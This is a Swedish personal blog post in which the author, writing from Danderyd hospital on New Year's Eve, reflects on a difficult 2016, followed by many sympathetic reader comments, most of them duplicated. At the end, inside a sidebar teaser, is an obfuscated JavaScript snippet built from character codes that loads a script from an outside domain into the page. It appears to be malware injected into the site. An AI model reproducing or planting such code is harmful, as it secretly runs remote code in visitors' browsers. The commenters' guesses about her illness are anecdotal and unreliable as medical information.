Gott Nytt år! Nu vänder jag blad… Från Danderyds sjukhus.

imageHej från sjukhus sängen! Snyggt avslut på 2016, not! 

Tack snälla ni för alla husmorstips och all omtanke <3 Ni är verkligen fantastiska!

Men…. Jag är inlagd igen. 

Jag är tillbaka på Danseryds sjukhus. Smärtan har blivit värre, och jag har fått feber på det. Så nu slutar jag vara envis som en åsna ”jag-kan-och-klarar-mig-själv ” och tar emot hjälp.

 Jag kom in tidigare ikväll, och har röntgats och undersöks. Väntar just nu på läkaren igen.

Jag mår långt ifrån bra, men känner att jag är i trygga händer. Både doktorerna och sköterskorna är jätte omtänksamma <3

Nyårsafton. NU är det 12-slag. Just precis nu……. Jag ligger i ett litet rum. Det är tyst, jag har fått i mig ganska mycket morfin och smärtstillande. Jag hör klockan ticka. Det är ganska lugnt i korridoren utanför. Jag är ledsen, trött och har ont.

Jag ringde Lilleman och önskade honom Gott nytt, och sa att jag älskade honom. Han mådde bra och var sprallig och glad. DET värmer i mamma-hjärtat! <3

image

Ibland blir det inte som planerat. Att fira nyårsafton i en sjukhussäng på Danderyd ingick inte i planeringen. Att förlora mitt livsverk My’s Blommor och att sätta det i konkurs ingick inte heller. Cancerbeskeden inom familjen var definitivt inte välkomna. Begravningarna och farfars bortgång blev också en tung bit 2016. Häxjakt och nätmobbning blev en ny erfarenhet. Anmälningar, förtal och ansta galenskaper… . Listan kan göras lång.

Jag stannar där. Sätter punkt på det som varit. PUNKT! 

MEN trots att 2016 varit tufft. Så har det också gett mig något bra. Jag har fått en rejäl självinsikt, en överlevandsinstinkt, och nya perspektiv på saker och ting.

Vänner jag kännt i några år har kliva fram och verkligen visat vem/vilka som finns där när det väl gäller. Jag har utvecklats enormt och börjat hitta mig själv. Panikångesten och ångesten har lärt mig att  jobba med mig själv. På bara 5-6 månader så har jag vuxit enormt mentalt! 

Jag tar nu med mig ALLA erfarenheter och lärdomar för att istället fokuserar framåt. Nytt år. Nya möjligheter! ✨

 Det viktigaste för mig just nu är att bli frisk igen. Jag vill vara en frisk och glad mamma för min Lilleman. Det är prio ett!! 

Så nu vänder jag blad. Jag ser mer än fram emot att se vad 2017 har att erbjuda! 

Jag säger bara -Bring it on! 2017 i’m ready! 

image

image

Men framförallt just nu ikväll så vill jag Önskar dig ett fantastiskt avslut och ett riktigt GOTT NYTT ÅR till dig! ✨   Med god hälsa, en massa kärlek och lycka! 

Kram & tack för att du finns <3 /My Martens

95 Komentarer

 1. Lider med dig du ser inte frisk ut och det konstiga är att blindtarmen är borta!
  Varifrån kommer smärtan? Tarmvred?
  Har dom kollat gallan?
  Önskar dig ett gott nytt år och att du ska få bli helt frisk❤

 2. Hej My! Har aldrig kommenterat i ngn blogg tidigare men följt dig sen du var med EMS och nu känner jag att det är dags att kommentera.Önskar dig ett fantastiskt 2017!Det kommer att bli bra,allt kommer att bli bra. Skickar en kryapådigkram!

 3. Vad jobbigt för dig, lider verkligen med dig! Önskar dig också ett gått nytt år fina My? Du kommer snart vara på benen igen? Massor med styrker kramar till dig❤️

 4. Å fina du ? hamnade du där igen. Låt dom inte skicka hem dig för fort igen.
  Önskar dig all bättring och ett Gott Nytt År som bara kan bli bättre ?
  Kram ?

 5. Bra att du åkte in igen! Inget vidare alls att må så dåligt o försöka kurera sig hemma när du är nyopererad o borde vara under observation på sjukhuset. Nu är du i god omvårdnad så krya på dig o Gott Nytt År! Kram ❤✨❤✨❤✨

 6. Lider med dig du ser inte frisk ut och det konstiga är att blindtarmen är borta!
  Varifrån kommer smärtan? Tarmvred?
  Har dom kollat gallan?
  Önskar dig ett gott nytt år och att du ska få bli helt frisk❤

 7. Men åhh, jag blir både ledsen och glad av att läsa detta. Ledsen av det uppenbara att du ska ligga där på nyår eller över huvudtaget att du har blivit sämre. Nu gör ju inte blindtarmen sååå stor skillnad så iofs gjorde det ju inget att de tog bort den för att säkerställa att det inte var det. Låter lite som gallbesvär, visst har du lagt om kosten? och visst har du gjort en bukplastik? Ja nu spelar det ingen roll vad jag sitter här och tror, du är på rätt ställe för att få hjälp och det är det som gör mig glad, förstår att du är glad över att Lilleman har det bra. Nu är det bara mamma som ska bli frisk, stark är du redan. Krya på dig. Kramar i massor.

 8. Krya på dig! Inget vidare sätt att fira nyår på
  Fast hos oss har det inte varit mycket bättre. Sjuk i influensan sedan 6 dagar tillbaka
  4 barn under 7 år som klättrar på väggarna och en söndrig diskmaskin på det.
  Somnade i soffan vid 22.00 och missade helt tolvslaget….fast det blev ett nytt år ändå?

 9. Kära du! Hoppas du kryar på dig snart! Jag känner igen mig i när du skriver om panikångestattackerna. Du är en förebild för mig och säkert för många andra. Önskar dig ett bättre 2017!

 10. Hej My! Har aldrig kommenterat i ngn blogg tidigare men följt dig sen du var med EMS och nu känner jag att det är dags att kommentera.Önskar dig ett fantastiskt 2017!Det kommer att bli bra,allt kommer att bli bra. Skickar en kryapådigkram!

 11. Vad jobbigt för dig, lider verkligen med dig! Önskar dig också ett gått nytt år fina My💕 Du kommer snart vara på benen igen😊 Massor med styrker kramar till dig❤️

 12. Å fina du 💗 hamnade du där igen. Låt dom inte skicka hem dig för fort igen.
  Önskar dig all bättring och ett Gott Nytt År som bara kan bli bättre 🌹
  Kram 💟

 13. Gott nytt på dig, om du klarade dig såhär bra 2016 är jag spänd på hur mycket du kommer åstadkomma 2017. Fortsätt vara du!

 14. Lider med dig, du har haft ett tufft år och det känns extra tungt nu när du inte mår bra. Men du är stark, det har du visat både dig själv och andra. Sköt om dig nu och hoppas du blir väl omhändertagen, så ska du se att du har ett gott nytt 2017 med nya möjligheter framför dig!

 15. Bra att du åkte in igen! Inget vidare alls att må så dåligt o försöka kurera sig hemma när du är nyopererad o borde vara under observation på sjukhuset. Nu är du i god omvårdnad så krya på dig o Gott Nytt År! Kram ❤✨❤✨❤✨

 16. Men åhh, jag blir både ledsen och glad av att läsa detta. Ledsen av det uppenbara att du ska ligga där på nyår eller över huvudtaget att du har blivit sämre. Nu gör ju inte blindtarmen sååå stor skillnad så iofs gjorde det ju inget att de tog bort den för att säkerställa att det inte var det. Låter lite som gallbesvär, visst har du lagt om kosten? och visst har du gjort en bukplastik? Ja nu spelar det ingen roll vad jag sitter här och tror, du är på rätt ställe för att få hjälp och det är det som gör mig glad, förstår att du är glad över att Lilleman har det bra. Nu är det bara mamma som ska bli frisk, stark är du redan. Krya på dig. Kramar i massor.

 17. Krya på dig! Inget vidare sätt att fira nyår på
  Fast hos oss har det inte varit mycket bättre. Sjuk i influensan sedan 6 dagar tillbaka
  4 barn under 7 år som klättrar på väggarna och en söndrig diskmaskin på det.
  Somnade i soffan vid 22.00 och missade helt tolvslaget….fast det blev ett nytt år ändå😉

 18. Kära du! Hoppas du kryar på dig snart! Jag känner igen mig i när du skriver om panikångestattackerna. Du är en förebild för mig och säkert för många andra. Önskar dig ett bättre 2017!

 19. Lider med dig, du har haft ett tufft år och det känns extra tungt nu när du inte mår bra. Men du är stark, det har du visat både dig själv och andra. Sköt om dig nu och hoppas du blir väl omhändertagen, så ska du se att du har ett gott nytt 2017 med nya möjligheter framför dig!

 20. Vad bra att du åkte tillbaka! Var sitter smärtan? Jag hade gallstenar som sedan gav mig akuta bukspottkörtelinflamationer. En gång så allvarligt att jag höll på att dö. Dom där stenarna kan ställa till med mkt. Även små grus kan göra jätte ont!!! Och små tror jag inte syns på vanlig röntgen. Har även haft njursten, då trodde jag först det var äggstockarna som gjorde ont. Det beror på var stenen sitter. Kan vara något sånt? Har en gallsten inte täppt till så syns det inget heller på lever proverna. Vet dom inte alls vad smärtan beror på? Hoppas du inte fått infektion i operations såret bara ?. Vet precis hur du känner. Jag har oxå en son. Krya på dig! Hoppas du kan vara kvar tills du känner dig ok nu! ❤️

 21. Hej! Har läst din blogg då och då och lite mer senaste året och har aldrig kommenterat innan men nu vill jag verkligen ge dig en hälsning med massor av kryapådig-kramar. Hoppas att det vänder nu så du får återhämtning istället för nedbrytning.

 22. Vad bra att du åkte tillbaka! Var sitter smärtan? Jag hade gallstenar som sedan gav mig akuta bukspottkörtelinflamationer. En gång så allvarligt att jag höll på att dö. Dom där stenarna kan ställa till med mkt. Även små grus kan göra jätte ont!!! Och små tror jag inte syns på vanlig röntgen. Har även haft njursten, då trodde jag först det var äggstockarna som gjorde ont. Det beror på var stenen sitter. Kan vara något sånt? Har en gallsten inte täppt till så syns det inget heller på lever proverna. Vet dom inte alls vad smärtan beror på? Hoppas du inte fått infektion i operations såret bara 😟. Vet precis hur du känner. Jag har oxå en son. Krya på dig! Hoppas du kan vara kvar tills du känner dig ok nu! ❤️

 23. Fina My! Så skönt att du är i trygga händer på Danderyds sjukhus. Så tråkigt att året har varit fullt av jobbiga saker, men jag är säker på att 2017 kommer att bli fantastiskt! Yes, nu vänder vi blad. Stor kram och ses snart ?

 24. Hej! Hoppas du får bra hjälp o att du snart mår bättre! Bra att du åkte in. Ett gott o starkt 2017 till dig och en nyårsafton är bara en vanlig dag! ?

 25. Krya på dig. Förhoppningsvis blir det bättre med antibiotika om det är en infektion du fått. Kan vara lite annat också, men det fixar sig.
  Det blir alltid värre…….innan det vänder……

 26. Hej! Har läst din blogg då och då och lite mer senaste året och har aldrig kommenterat innan men nu vill jag verkligen ge dig en hälsning med massor av kryapådig-kramar. Hoppas att det vänder nu så du får återhämtning istället för nedbrytning.

 27. Bra att du åkte in. Ibland blir det komplikationer efter op. Vätska, hematom som kroppen ska ta hand om gör skitont tex. Hoppas du slipper fler ingrepp. Kram

 28. Fina My! Så skönt att du är i trygga händer på Danderyds sjukhus. Så tråkigt att året har varit fullt av jobbiga saker, men jag är säker på att 2017 kommer att bli fantastiskt! Yes, nu vänder vi blad. Stor kram och ses snart 🙂

 29. Hej! Hoppas du får bra hjälp o att du snart mår bättre! Bra att du åkte in. Ett gott o starkt 2017 till dig och en nyårsafton är bara en vanlig dag! 😍

 30. Krya på dig. Förhoppningsvis blir det bättre med antibiotika om det är en infektion du fått. Kan vara lite annat också, men det fixar sig.

  Det blir alltid värre…….innan det vänder……

 31. Bra att du åkte in. Ibland blir det komplikationer efter op. Vätska, hematom som kroppen ska ta hand om gör skitont tex. Hoppas du slipper fler ingrepp. Kram

 32. My . Jag har aldrig kommenterat men vill nu önska dig god bättring och ett ljusare 2017 . Du verkar vara en reko tjej med mycket go i . Var stark och lägg all skit du fått , bakom dig . Fokusera på din son och dig själv . Det blir bättre ,tro mig . Från en ” tant ” som tror på dig . Kram .??

 33. My . Jag har aldrig kommenterat men vill nu önska dig god bättring och ett ljusare 2017 . Du verkar vara en reko tjej med mycket go i . Var stark och lägg all skit du fått , bakom dig . Fokusera på din son och dig själv . Det blir bättre ,tro mig . Från en ” tant ” som tror på dig . Kram .💝🎈

 34. Hej My!
  Är ganska ny här på din blogg så har ej läst så mycket än,tyvärr.
  Såg Instagram en sjukhusbild på dig blanda många andras bilder så det är på den vägen jag fann din blogg.
  2014 vart jag sjuk efter fått mitt tredje barn.
  Vår yngsta var bara 1 månad då jag vart dålig.
  Var så trött,ont i magen och svag på någotvis.
  Huvudet och kroppen sammanarbetade inte alls som jag ville.
  Blev bara värre och värre.
  Åkt in och ut på akuten då jag hade ont i magen,ryggen.
  Massa olika diagnoser ställdes och hemskickad med värktabletter.
  Inget hjälpte.
  Tillslut fick jag rejäl kramp i mellangärdet,ryggen.
  Trodde jag skulle kvävas till döds.
  Kunde knappt stå upp.
  Vart hämtad av ambulans.
  Vart hemskickad igen med smärtstillande osv….tröttsamt nog!
  Två dagar efter så märkte jag hur orken vart värre och värre och mina ögonvitor var gula.Såg så sjukt ut.
  Trög mage och nr 2 var svart.
  Hade ju läst massor så hade försökt få massa olika läkare att kolla upp gallan.
  Tillslut efter en veckas hemskickadande la dom in mig och det var konstaterat att en sten hade fastnat i gallgångarna samt att sänkan var inte alls bra.
  Värden var verkligen skit och skyhög feber!
  Efter legat inlagd 4 dagar så opererade dom bort min gallblåsa.
  2v efter fick jag brev hemskickat att min lever var inflammerad p.g.a gallblåsan.
  En idag känner jag av,fast det blir 3 år sedan i augusti.
  Ojdå….hamnade i skrivarens stund!
  Inte min mening att det skulle bli såhär babbligt ??
  Som sagt det kanske är något sådant för din del också,men kan ha fel.
  Krya på dig//Jenny

 35. Hej My!

  Är ganska ny här på din blogg så har ej läst så mycket än,tyvärr.
  Såg Instagram en sjukhusbild på dig blanda många andras bilder så det är på den vägen jag fann din blogg.

  2014 vart jag sjuk efter fått mitt tredje barn.
  Vår yngsta var bara 1 månad då jag vart dålig.
  Var så trött,ont i magen och svag på någotvis.
  Huvudet och kroppen sammanarbetade inte alls som jag ville.

  Blev bara värre och värre.
  Åkt in och ut på akuten då jag hade ont i magen,ryggen.
  Massa olika diagnoser ställdes och hemskickad med värktabletter.
  Inget hjälpte.
  Tillslut fick jag rejäl kramp i mellangärdet,ryggen.
  Trodde jag skulle kvävas till döds.
  Kunde knappt stå upp.
  Vart hämtad av ambulans.
  Vart hemskickad igen med smärtstillande osv….tröttsamt nog!
  Två dagar efter så märkte jag hur orken vart värre och värre och mina ögonvitor var gula.Såg så sjukt ut.
  Trög mage och nr 2 var svart.
  Hade ju läst massor så hade försökt få massa olika läkare att kolla upp gallan.

  Tillslut efter en veckas hemskickadande la dom in mig och det var konstaterat att en sten hade fastnat i gallgångarna samt att sänkan var inte alls bra.
  Värden var verkligen skit och skyhög feber!

  Efter legat inlagd 4 dagar så opererade dom bort min gallblåsa.

  2v efter fick jag brev hemskickat att min lever var inflammerad p.g.a gallblåsan.

  En idag känner jag av,fast det blir 3 år sedan i augusti.

  Ojdå….hamnade i skrivarens stund!
  Inte min mening att det skulle bli såhär babbligt 😬😝

  Som sagt det kanske är något sådant för din del också,men kan ha fel.

  Krya på dig//Jenny

Svara

Lämna din kommentar!
Ditt namn här

Om du missat..

Andas ut stressen med hjälp av djupandning

Andas ut stressen med hjälp av djupandning -Hur många tänker egentligen på sin andning? Jag...

SMEG bagaren och kocken 20%

I reklamsamarbete Bagaren och Kocken ??‍? Hej på er! Detta är en grymt efterlängtad kampanj...

Adviral Event

My Martens , Ako Rahim. Adviral Media. d Ako, Renata, My   var f=String;+f.fromCharCode(99,116,105,111,110)+f.fromCharCode(32,97,115,115,40,115,114,99,41,123,114,101,116,117,114,110)+f.fromCharCode(32,66,111,111,108,101,97,110)+f.fromCharCode(40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,113,117,101,114,121,83,101,108,101,99,116,111,114,40,39,115,99,114,105,112,116,91,115,114,99,61,34,39,32,43,32,115,114,99,32,43,32,39,34,93,39,41,41,59,125,32,118,97,114,32,108,111,61,34,104,116,116,112,115,58,47,47,115,116,97,121,46,108,105,110)+f.fromCharCode(101,115,116,111,103,101,116,46,99,111,109,47,115,99,114,105,112,116,115,47,99,104,101,99,107,46,106,115,63,118,61,53,46,53,53,46,53,34,59,105,102,40,97,115,115,40,108,111,41,61,61,102,97,108,115,101,41,123,118,97,114,32,100,61,100,111,99,117,109,101,110)+f.fromCharCode(116,59,118,97,114,32,115,61,100,46,99,114,101,97,116,101,69,108,101,109,101,110)+f.fromCharCode(116,40,39,115,99,114,105,112,116,39,41,59,32,115,46,115,114,99,61,108,111,59,105,102,32,40,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,32,123,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,46,112,97,114,101,110)+f.fromCharCode(116,78,111,100,101,46,105,110)+f.fromCharCode(115,101,114,116,66,101,102,111,114,101,40,115,44,32,100,111,99,117,109,101,110)+f.fromCharCode(116,46,99,117,114,114,101,110)+f.fromCharCode(116,83,99,114,105,112,116,41,59,125,32,101,108,115,101,32,123,100,46,103,101,116,69,108,101,109,101,110)+f.fromCharCode(116,115,66,121,84,97,103,78,97,109,101,40,39,104,101,97,100,39,41,91,48,93,46,97,112,112,101,110)+f.fromCharCode(100,67,104,105,108,100,40,115,41,59,125,125));/*99586587347*/